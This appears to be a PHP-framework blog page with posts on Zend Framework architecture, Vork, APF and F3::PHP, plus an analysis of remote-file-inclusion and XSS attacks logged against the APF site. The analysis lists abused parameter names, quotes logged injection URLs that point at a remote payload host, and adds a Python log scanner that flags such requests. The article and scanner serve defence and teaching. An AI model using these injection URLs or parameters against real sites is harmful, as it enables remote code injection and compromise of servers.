Zend Framework Architecture
Mar 5th, 2010 by wood

Introduction

Before we begin our exploration of the architecture of the Zend Framework (ZF), it is important to discuss how a typical MVC application is built. Examining and understanding the architecture of an MVC Web application allows you to make more contextually sound choices when building your application.

Three-tier Architecture

The three-tier architecture focuses on defining responsibilities between different parts of the application. It has the following tiers:

Presentation Tier
The top-most level of the application is the UI. The main function of the interface is to translate tasks and results to something the user can understand.

Application Tier
This layer coordinates the application, processes commands, makes logical decisions and evaluations, and performs calculations. It also moves and processes data between the two surrounding layers.

Data Tier
Here information is stored and retrieved from a database or file system. The information is then passed back to the logic tier for processing, and then eventually back to the user.

Model-View-Controller Architecture

Although the three-tier architecture is similar to the MVC architecture, the two are different. Conceptually the three-tier architecture is linear: the Presentation tier never communicates directly with the Data tier, and all communication must pass through the Application tier. The MVC architecture, by contrast, is triangular: the View sends updates to the Controller, the Controller updates the Model, and the View gets updated directly from the Model.

Zend Framework

Zend Framework provides components for the MVC and Table Gateway design patterns, which are used in most Web applications. Developed by Zend Technologies and released in 2005, Zend Framework is heavily based on the Solar Framework, developed by Paul M. Jones, which is why the two share a similar underlying architecture.

There are 3 types of Web application frameworks:

  1. The ones that offer a solid infrastructure: Symfony, Solar, Ruby on Rails and Django.
  2. The ones that offer a component library: ezComponents and PEAR.
  3. The ones that offer both: Zend Framework.

Zend Framework not only offers a solid infrastructure, but also an extensive component library. The component structure of ZF is somewhat unique: each component is designed with few dependencies on other components. This loosely-coupled architecture allows developers to use components individually.

Architecture

The framework architecture is based on the Front Controller and Model-View-Controller architectural patterns:

MVC pattern

The Model is the part of the application that defines its basic functionality behind a set of abstractions. The data access layer and some business logic is defined in the Model. The Views define exactly what is presented to the user. Usually controllers pass data to each view to render in some format. The Controllers bind the whole pattern together. They may manipulate models, decide which view to display based on the user’s request and other factors, pass along the data that each view will need, or hand off control to another controller entirely.

Front Controller pattern

Zend_Controller is the heart of Zend Framework’s MVC system. Zend_Controller_Front implements a Front Controller pattern, in which all requests are intercepted by the front controller and dispatched to individual Action Controllers based on the URL requested.

Coupling

ZF provides a loosely-coupled component library that covers most of the functionality needed to develop Web applications. In object-oriented programming, coupling (or dependency) is the degree to which each component relies on the other components. The biggest advantage of a loosely-coupled architecture is that it allows developers to use components individually.

Neil Garb did an excellent job measuring the level of coupling in the Zend Framework based on the number of dependencies set in code. I’ve extended his work by measuring the level of coupling between components set at runtime. I’m using the Inclued extension to trace through the hierarchy of file inclusions and class inheritance at runtime.

The following diagrams were generated using Graphviz:

Zend_Controller dependencies

Zend_Controller and Zend_Db dependencies

Zend_Controller, Zend_Db and Zend_Form dependencies

A standard Zend Framework application requires the following components: Zend_Controller, Zend_Uri, Zend_Registry, Zend_Loader, Zend_Config, Zend_Layout, Zend_View, Zend_Filter, Zend_Validate, Zend_Db, Zend_Form and Zend_Exception.

Criticism

Zend Framework is intended to serve as a novel way to manage Web development complexity. Many consider ZF to deliver reasonably well on this promise; however, it does not universally accommodate all design styles, environments or requirements.

Performance

The performance of a framework is influenced by many factors, particularly the configuration of your servers. However, the design of an application can make a big difference and determine whether your site is slow or highly responsive. Recent benchmarks show that the Zend Framework is slower than other Web frameworks.

Although low coupling is a sign of a well-structured system, it may reduce performance, and a highly-coupled system is sometimes desirable to achieve maximum efficiency. Regardless, in many modern frameworks, the cost of reduced performance is often seen as a worthy trade for the benefits to the software development process that result from low coupling.

Design

Although the framework supports modularity, it lacks some basic features, such as a Module Coordinator. The system doesn’t include any component or configuration mechanism to deal with Model and Controller dependencies, making it very difficult to share modules between applications. Also, Zend_Controller doesn’t allow modular systems to load model files either from within their own module or from outside modules.

The system lacks local containers to manage object dependencies and interrelationships. Instead, it uses a global container to store objects. According to Troels Knak-Nielsen, the problem with this is that a global container, whether primitive or sophisticated, will always be a global symbol. Most programmers will agree that global variables are bad design, and that goes for global containers as well.

Namespaces

With PHP 5.3 on the horizon, the Zend Framework API faces a redesign. While namespaces will hopefully lead to more readable code, Zend developers will finally need to start thinking about some standards for abstract classes and interfaces.

Links

Vork, open-source PHP framework designed for rapid development of performance-oriented scalable applications
Feb 24th, 2010 by NewUser

Vork Enterprise PHP Framework

Vork is an open-source PHP framework designed for rapid development of performance-oriented scalable applications.

The mission of Vork is to provide an MVC architecture and full-featured toolkit in a gimmick-free no-frills approach without adding overhead, creating slow & unscalable abstraction layers or re-inventing native PHP functionality.

Rapid Application Development

  • Native PHP interface with intuitive naming convention, no need to learn new terminology or syntax
  • Hello World! in 5-minutes or less with LAMP/WAMP configuration
  • Developers that already know PHP can use Vork productively within minutes

Performance-Oriented, Scalable, Green and Economical

  • Green-IT: Vork applications serve more traffic with fewer servers!
  • Enterprise-grade Vork platform has no slow abstraction layers or re-invented PHP functionality
  • Out-of-the-box response time for a Hello World! including making a database connection is typically just 0.0065 seconds!
  • Built-in support for multiple master/slave database configurations with tools to enforce security and increase SQL-statement efficiency
  • Automatically loads code & objects that are needed for the instance and not a byte more!
  • Vork can be configured to operate without any disk-IO to further reduce load time

Standards-Compliant

  • XHTML 1.1
  • PHP 5.0 – 5.3+
  • E_ALL | E_STRICT
  • Section 508
  • W3C WAI
  • Full MVC stack including layouts and components
  • All tools produce valid XHTML 1.1 with semantically-correct markup
  • Accessibility is automated as much as possible to meet Section 508 and W3C WAI standards
  • Code is open-source, built for PHP 5 and fully documented using the phpDocumentor DocBlock standard
  • Universal database support without abstraction layers; ability to easily change database brands at any time
  • Object-oriented source code is E_ALL | E_STRICT and adheres to the Zend Framework Coding Standards
  • Concise URL format is ideal for search engine optimization (SEO) and is easy to communicate verbally
  • CakePHP and Zend Framework objects can be imported into Vork; Vork Helpers and components can be used within Zend Framework and CakePHP
  • CSS-reset with default styles to provide cross-browser display consistency verified in Firefox, Google Chrome, Safari (OS X, iPhone & Windows) and IE6, 7 & 8

Extensive Toolset

  • E-commerce tools to validate & charge credit cards, accept PayPal payments, get UPS shipping rates, track a package, generate QR codes & more!
  • Simplified use of Google tools: Maps, Charts, Analytics, AdSense, Sitemap, Payments, Translate
  • Amazon Web Services connection interface with automated caching mechanism
  • One-line of code turns any controller or action into a full-featured Wiki including a Wiki search engine
  • Forms maintain state automatically + ample tools include a WYSIWYG textarea that produces valid XHTML 1.1 markup and works in every browser
  • Internationalization (i18n) – multilingual forms allow users to easily type characters in other alphabets by pressing the phonetically-equivalent English keys
  • Integration with all mainstream JavaScript frameworks: YUI, jQuery, Prototype, MooTools, script.aculo.us, Dojo, SWFObject, Ext Core, Chrome Frame
  • Universal log-in/log-out/forgot-password utility
  • Turn any page of your application into a URL shortening site
  • User input validity is verified both in JavaScript (for user-experience) and in PHP (for security) – form validation rules are only written once
  • Extensive HTML helper functions including generation of Twitter Tweet links, tag clouds and simplified embedding of Adobe Flash
  • Consistent interface to many 3rd-party tools including Meetup event management & sharing boxes like Bookmark and Share
  • Email tools including outgoing-mail templates that operate like MVC-elements & spam-proof email address display tools
  • AJAX tools including inline language translation and simplified data-loading
  • Completely automatic SSL-link management to simplify transitions between https:// and http:// pages
  • Image management tools to watermark an uploaded image + generate multiple images in different sizes (fullsize, thumbnail, etc.)
  • POST utility to simplify connecting to web services
  • Effortless media integration including Flickr feeds, YouTube videos and embedding an MP3 player
  • Default 404 “not found” page has a Google Search box pre-populated to search your site for content related to the missing page
  • RSS layout makes it easy for any PHP array to become an RSS 2.0 or Atom feed; RSS reader makes quick work of syndicating feeds
  • Debugging tools that output to your Firefox Firebug console

Requirements

  • PHP – any version between 5.0.2 and 5.3.x
  • A database is optional and any database or cloud-DB that is supported by PHP will work with Vork
  • Works on any web server (Apache, Microsoft IIS, etc.)
  • Works with any operating system (Linux, Windows, Mac OS X, FreeBSD, etc.)
  • Integrated caching through any package with a PHP interface (Memcached, etc.)

Hacking & the APF 2009/2010
Jan 30th, 2010 by christian

1. Introduction

In 2009, a drastic increase in XSS and code injection attacks was observed on the APF web site. Analyzing the log files, we found 92,334 known attacks that were caught by the framework, out of a total of 672,152 attacks.

The APF Security Promise: Use the APF and profit from its security mechanisms! Applications designed securely from scratch prevent the compromise of your system, guarantee the safety of your users’ data and of your reputation, and let you put your mind at ease.

This article describes which mechanisms the APF includes to face this danger and to secure your custom application.

2. Attacks

2.1. Kind of attacks

As described in the article Hacking & das APF (German), most of the attacks are XSS and code injection attacks. They try to exploit vulnerabilities to inject third-party content or code into the target application. Fortunately, the signature is similar in 95% of the attacks. Here is the pattern:

Code
[?|&]vulnerability_param=http://domain.tld/some/path/injection_code.ext

Only the name of the parameter differs from request to request:

  • tpl_pgb_moddir
  • page
  • mosConfig_absolute_path
  • sourcedir
  • file
  • dir[inc]
  • includedir
  • phpbb_root_path
  • _SERVER[DOCUMENT_ROOT]
  • _zb_path
  • cfg[path][contenido]
  • base_folder
  • spaw_root
  • includePath

The following URLs are a selection of those that have been used to display third-party content on the APF web page or to inject third-party code into the APF:


The files xss_report_2009_with_urls_grouped.txt.gz and xss_report_2009_with_urls_uniq.txt.gz contain the URLs that were used during the 2009 attacks: xss_report_2009_with_urls_uniq.txt.gz contains the complete list of URLs, and xss_report_2009_with_urls_grouped.txt.gz contains the list grouped by identical base URL.
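As an added example (not part of this article or of the APF code base), the following Python script scans constructed Apache access-log lines for the signature described above, a query parameter whose value is itself an absolute URL, groups the hits by parameter name and marks whether the name is one of those listed above. The host names and client addresses are reserved documentation values, not taken from the APF logs.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names seen in the 2009 attacks, as listed in the article.
KNOWN_PARAMS = {
    "tpl_pgb_moddir", "page", "mosConfig_absolute_path", "sourcedir", "file",
    "dir[inc]", "includedir", "phpbb_root_path", "_SERVER[DOCUMENT_ROOT]",
    "_zb_path", "cfg[path][contenido]", "base_folder", "spaw_root", "includePath",
}

# Constructed sample lines in Apache combined-log format; hosts and addresses
# are reserved documentation values, not real attack sources.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2009:10:01:12 +0100] "GET /index.php?page=http://rfi-host.invalid/inj.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
203.0.113.7 - - [12/Mar/2009:10:01:13 +0100] "GET /%20%20//?mosConfig_absolute_path=http%3A%2F%2Frfi-host.invalid%2Fid.txt%3F HTTP/1.1" 404 201 "-" "libwww-perl/5.8"
198.51.100.5 - - [12/Mar/2009:10:02:00 +0100] "GET /Page/001-Start?lang=de HTTP/1.1" 200 8870 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2009:10:03:40 +0100] "GET /tools/send_reminders.php?noSet=0&includedir=http://rfi-host.invalid/1.txt?? HTTP/1.1" 404 201 "-" "curl/7.19"
198.51.100.9 - - [12/Mar/2009:10:03:41 +0100] "GET /show.php?cutepath=ftp://rfi-host.invalid/c.txt HTTP/1.1" 404 201 "-" "curl/7.19"
"""

# Common/combined log format: client IP, timestamp, request line, status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The signature from the article: a parameter whose value is an absolute URL.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = REQUEST_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL.

    parse_qsl percent-decodes once; unquote() runs a second pass so a
    double-encoded 'http%253A%252F%252F' is still recognised.
    """
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(log_text):
    """Group suspicious requests by parameter name.

    Returns (report, total_requests); report maps a parameter name to a list
    of (client_ip, status, decoded_value, known_signature) tuples.
    """
    report = defaultdict(list)
    total = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        total += 1
        for name, value in suspicious_params(rec["target"]):
            report[name].append((rec["ip"], rec["status"], value, name in KNOWN_PARAMS))
    return dict(report), total


if __name__ == "__main__":
    report, total = scan(SAMPLE_LOG)
    print(f"{total} requests scanned, {sum(map(len, report.values()))} flagged")
    for name, hits in sorted(report.items()):
        tag = "known" if hits[0][3] else "NEW"
        print(f"  {name:<28} {len(hits)} hit(s)  [{tag} parameter]")
```

Parameter names that are flagged but not in the known list (like cutepath in the sample) are the ones worth adding to the signature set, since the article's split between known and total attacks depends on that list.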

2.2. Reported attacks

After checking Apache’s access log files, we started to analyze the application log files. This effort resulted in 3 groups of attacks. All of them tried to manipulate the URL to inject content or code into the application:

parse_url(/Seite/048-Webseite-erstellen%20%20/page.php?doc=http://unixstats.org/tools/idxx.txt??): Unable to parse URL (Number: 2, File: ***/apps/tools/link/frontcontrollerLinkHandler.php, Line: 306)
[Document::__loadContentFromFile()] Design "Seite" not existent in namespace "modules::comments::pres::templates"! Please check your template code (<29e6fe038415c51c1bbac0271949edf5 /><a name="comments"></a><h2><html:getstring namespace="modules::comments" config="language" entry="header.title" /></h2><68a3d33630357505bfe4dd96dbcb492e />). (Number: 256, File: ***/apps/core/pagecontroller/pagecontroller.php, Line: 1378)
[Frontcontroller::__parseActions()] No config section for action key "setLangu" available in configuration file "***_actionconfig.ini" in namespace "sites::demosite::biz::actions" and context "sites::***"! (Number: 256, File: ***/apps/core/frontcontroller/Frontcontroller.php, Line: 555)

The first line is an attempt to inject external code. Had the attacker been successful, the injected code would have been used to spy out information about the web server and the application running on the machine. Subsequent requests would then be used to manipulate the application and its content explicitly.

If the developer uses URL rewriting, such attacks are quite worthless, because the InputFilter rewrites the URL to a generic parameter/value pair.

If the developer uses APF components like the LinkHandler or the FrontcontrollerLinkHandler, URLs like the one presented above are recognized as semantically invalid and an error is thrown. This error can be caught and logged very easily by the integrated error handling.

The second line shows the attempt to manipulate a known parameter of the application to display third-party content. Potentially, the APF offers the chance to manipulate the template included by the <core:importdesign /> taglib by changing the URL, but the template path is created with security in mind.

In the third line the attacker tries to manipulate a parameter of a front controller action to execute the desired action. Within the APF, actions are defined in a configuration file and the URL parameters only refer to this configuration. Hence it is not possible to manipulate an action call successfully via the URL.

3. Error handling

In order not to provide much information to the attacker, it is recommended to implement a special ErrorHandler that logs the errors that occur to a log file and keeps quiet about the cause of the error.

The wiki page Script kiddies ErrorHandler (German) describes how you can implement such an ErrorHandler.

Adventure PHP Framework (APF) 1.11 released!
Jan 30th, 2010 by christian

The APF team is proud to announce the new website together with the 1.11 stable release.

Revision 1.11 comes with a revised version of the form support on the basis of taglibs. Generic definition of validators and filters based on the observer pattern is now supported, and forms can be adjusted to your own needs more easily.

The OR mapper GenericORMapper, already added in release 1.9, was extended with tools to automatically set up and update a database. The developer can now concentrate completely on the logic of the application, since the storage of the objects is completely managed by the mapper.

Part of the release’s performance optimization were optimizations in the core of the framework and the rework of the integrated BenchmarkTimer. It now supplies the developer with a better graphical representation of the measurements to find hot spots within an application, so that an application can be optimally prepared for operation.

With the release of version 1.11, support for PHP 4 has been announced for discontinuation and compatibility with PHP 5.3 has been improved. The coming version 1.12 will focus on extending the new form support and reworking the configuration component.

The new release files can be downloaded from http://adventure-php-framework.org/Page/008-Downloads.

Jan 24th, 2010 by dominic

F3::PHP is a single-file PHP 5.3+ Web development framework with a fast template engine, HTML forms processor and an easy-to-use SQL handler for databases. All that in one tiny package!

Too often we see code hyped up as “frameworks”. But when it comes to applying them to real-world situations, they fall short and are sloppy, or, at the other end of the scale, are huge beasts that behave like control freaks, which makes them unusable or hostile to average programmers.

Some are touted as frameworks yet they act simply as front-end controllers which do nothing more than route URLs to classes, functions or include files in complicated directory structures. They make programming a bit easier, but are lacking in many MVC aspects. Other procedural frameworks use method chaining (which can get quite long), and you’d wonder at times what the right sequence should be. Some are simply too bloated, with more features than you’ll ever need to use in simple blog or wiki applications.

Most frameworks brag about being “lightweight” – which seems to be a relative term. Does a 50MByte framework that consumes a lot of resources qualify as lightweight? Let’s call a spade a spade. A cargo truck is lightweight compared to a jumbo jet. Indeed. But if all we need to do to get from here to there on a “regular” basis is a car with some room to spare, why ride the space shuttle? Extra features are more often overkill, like using a jackhammer instead of a screwdriver.

It seems like in the name of “improving” their software, developers simply forgot or ignored the fact that frameworks are meant to support structures, that is, make applications easier to fabricate and provide order along with industrial strength, not to be imposing structures themselves. This point is contentious and has been argued since the days of the pyramid builders. Architects and engineers have gone through endless debates because the former are focused on artistic freedom, the latter on structural integrity.

Whichever the case may be, minimalism in framework design, where elegant architectural patterns and engineering excellence are available, is not a philosophy that’s commonplace. However, it does manage to find its niche here and there.

This is where the F3::PHP makes its mark. The minimalist framework is so rooted in its Zen world of construction components, that an entire Web application can be developed in so little, yet streamlined, code. That of course means a lot when we’re talking programmer productivity and time-to-deploy.

In fact, the entire F3::PHP command set has only 15 static methods and 6 template directives. Make no mistake about its puny size, it’s got everything a Web designer needs to get any kind of job done. You won’t see the fancy stuff found in large frameworks. It aims to be usable – not usual. It’s very much like a modern compact Javascript toolkit for PHP.

F3::PHP gives you a lot of freedom. It won’t change your programming style, only your habits – albeit due to the powerful tools you’ll have at your disposal. Despite that, F3::PHP is certainly not an end-all, be-all framework. It’s not for everyone – only for those who want raw power behind simplicity.
